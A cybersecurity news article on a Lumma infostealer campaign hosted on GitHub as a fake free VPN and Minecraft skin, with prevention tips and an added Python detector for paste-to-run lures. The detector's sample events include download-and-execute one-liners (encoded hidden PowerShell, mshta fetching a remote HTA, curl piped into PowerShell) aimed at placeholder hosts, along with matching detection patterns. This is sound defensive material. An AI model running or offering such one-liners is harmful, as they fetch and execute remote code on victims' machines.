Hackers use GitHub to spread malware disguised as a free VPN


Attackers are weaponizing GitHub to deliver powerful infostealing malware under the guise of a free VPN.

By now, you'd think people might be suspicious of a random free VPN floating around on GitHub. But threat actors keep dropping the bait, expecting to steal data from naive users.

That’s exactly what one campaign, identified by cybersecurity firm Cyfirma, did. The malware was hosted openly on a GitHub account, disguised as “Free VPN for PC.” Rather than function as advertised, it installed the Lumma infostealer on victims’ systems.


Cyfirma also found a similar sample uploaded under the name “Minecraft Skin,” suggesting that the attacker was targeting multiple user groups, from privacy-seeking adults to younger gamers.

The use of GitHub in this campaign highlights an ongoing problem: attackers turning to trusted, open platforms to deliver malware. Because anyone can publish a repository, and a github.com download link inherits the platform’s reputation, malicious actors can host and distribute payloads without raising immediate red flags.


Lumma infostealer is one of the most popular infostealers in the wild. Victims have reported getting infected through multiple channels, including YouTube videos that pose as cracked software tutorials, luring users into downloading malware installers.

Others encounter it through fake CAPTCHA pop-ups, which trick users into running malicious scripts under the pretense of verifying they're human.

The malware is written in C and has been sold through a malware-as-a-service (MaaS) model on underground forums and a Telegram channel since 2022. It’s priced at $140-$160 per month.

The US Justice Department and Microsoft announced the takedown of over 2,300 malicious domains this May, disrupting the central command-and-control infrastructure of the LummaC2 infostealer.


How to prevent future Lumma infostealer infections

  • Avoid clicking suspicious links: Most Lumma Stealer infections start with a phishing link. These can appear in emails, social media messages, or in ads. Always check whether the link you’re clicking comes from a reputable website.
  • Don’t download files from unknown sources: Lumma Stealer is often hidden in files like pirated games, TV shows, or ebooks. If you’re downloading files from such sources, proceed with extreme caution.
  • Use antivirus software: Keep antivirus software installed with real-time protection enabled. It will block known Lumma Stealer samples before they run, though it will not catch every new build, so it should be one layer among several.
  • Do not paste commands into the command line or run window: Lumma Stealer websites often prompt you to run something in your run window or command line to “confirm your identity.” No legitimate verification works this way. Do not paste commands from unknown websites into the command line, as these attacks can be hard to detect even for the best antivirus software.
  • Enable two-factor authentication (2FA): If you do become infected, 2FA makes it harder for attackers to log in with stolen passwords to important accounts like your online banking or email. Note that Lumma also steals browser session cookies, which can bypass 2FA, so after an infection you should also sign out of all sessions and change your passwords from a clean device.
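The paste-to-run lure in the last bullet (and the fake CAPTCHA pop-ups mentioned earlier) leaves a recognizable trace in endpoint telemetry: an interactive parent such as explorer.exe spawning a shell with a hidden window, an encoded command, or a download-and-run one-liner. The Python below is an added example, not code from the article or from Cyfirma’s report. It scans process-creation events for that pattern. The event records are constructed here to resemble Windows process-creation events (Sysmon Event ID 1 or Security 4688), and the field names Image, ParentImage, CommandLine and ProcessId are assumptions about your log format.

```python
"""Flag ClickFix-style paste-to-run executions in process-creation events.

Added example; field names and sample events are assumptions/constructed,
modelled loosely on Sysmon Event ID 1 fields.
"""
import re

# Shells and LOLBins that paste-to-run lures ask the victim to launch.
INTERPRETERS = {
    "powershell.exe", "pwsh.exe", "mshta.exe",
    "cmd.exe", "wscript.exe", "cscript.exe",
}
# Parents that mean a human typed or pasted the command (Run dialog, Explorer,
# a terminal) rather than a scheduled task or service.
INTERACTIVE_PARENTS = {"explorer.exe", "windowsterminal.exe", "conhost.exe"}

# Command-line traits typical of these lures, checked in this order.
SUSPICIOUS_PATTERNS = [
    (r"(?i)-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", "base64-encoded command"),
    (r"(?i)-w(?:indowstyle)?\s+hidden", "hidden window"),
    (r"(?i)\b(?:iwr|invoke-webrequest|curl|wget|invoke-expression|iex)\b", "download/execute cmdlet"),
    (r"(?i)\bmshta(?:\.exe)?\s+https?://", "mshta remote URL"),
    (r"(?i)https?://[^\s'\"]+", "remote URL"),
]


def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze(event: dict) -> list[str]:
    """Return the reasons an event looks like paste-to-run; empty if benign.

    Only interpreters launched from an interactive parent are considered, so a
    script-spawned PowerShell is deliberately out of scope for this detector.
    """
    image = basename(event.get("Image", ""))
    parent = basename(event.get("ParentImage", ""))
    if image not in INTERPRETERS or parent not in INTERACTIVE_PARENTS:
        return []
    cmd = event.get("CommandLine", "")
    return [label for pattern, label in SUSPICIOUS_PATTERNS if re.search(pattern, cmd)]


def scan(events: list[dict]) -> dict[int, list[str]]:
    """Map ProcessId -> reasons for every event that triggers the detector."""
    hits = {}
    for event in events:
        reasons = analyze(event)
        if reasons:
            hits[event["ProcessId"]] = reasons
    return hits


# Constructed sample events (not real telemetry). The base64 blob is a
# placeholder with no meaning beyond matching the encoded-command pattern.
SAMPLE_EVENTS = [
    {   # user simply opened a console: interactive parent, but nothing suspicious
        "ProcessId": 1001, "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell.exe",
    },
    {   # classic fake-CAPTCHA payload pasted into Win+R
        "ProcessId": 1002, "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell.exe -w hidden -ec SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA",
    },
    {   # mshta pulling a remote HTA
        "ProcessId": 1003, "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\mshta.exe",
        "CommandLine": "mshta.exe https://example.invalid/verify.hta",
    },
    {   # same download one-liner, but spawned by a service: not paste-to-run
        "ProcessId": 1004, "ParentImage": r"C:\Windows\System32\services.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell.exe -c iwr https://example.invalid/update.ps1",
    },
    {   # cmd wrapper piping a download into PowerShell
        "ProcessId": 1005, "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\cmd.exe",
        "CommandLine": "cmd.exe /c curl -s https://example.invalid/fix.ps1 | powershell -",
    },
]

if __name__ == "__main__":
    for pid, reasons in scan(SAMPLE_EVENTS).items():
        print(pid, ", ".join(reasons))
```

The parent-process filter is what separates this from a generic “encoded PowerShell” rule: the point is a human pasting into Run, so anything launched by services.exe or a scheduler is left to other detections. On a suspected host, the Explorer RunMRU key (HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU) also preserves what was typed into the Run dialog and is worth checking alongside the process log.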

Check out Cybernews’ step-by-step guide on how to remove Lumma infostealer from your device.